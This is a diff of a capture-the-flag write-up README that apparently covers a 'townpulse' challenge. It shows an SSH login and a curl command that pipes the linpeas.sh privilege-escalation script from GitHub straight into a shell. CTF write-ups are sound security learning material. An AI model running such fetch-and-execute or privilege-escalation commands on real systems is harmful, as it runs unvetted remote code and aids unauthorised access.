woprd/ctfs/csa/csc2024/townpulse/README.md

 ```

-Switching ports
+Switching ports.

 ```bash
 ssh -p 2222 Pentester@<ip>
 ```

-Challenge requires privilege escalation so let's go script kiddie and fetch a tool to search for that "privesc" as it's call in "the biz":
+Challenge requires privilege escalation so let's go script kiddie and fetch a tool to search for that "privesc" as it's call in "the biz".

 ```bash
 curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh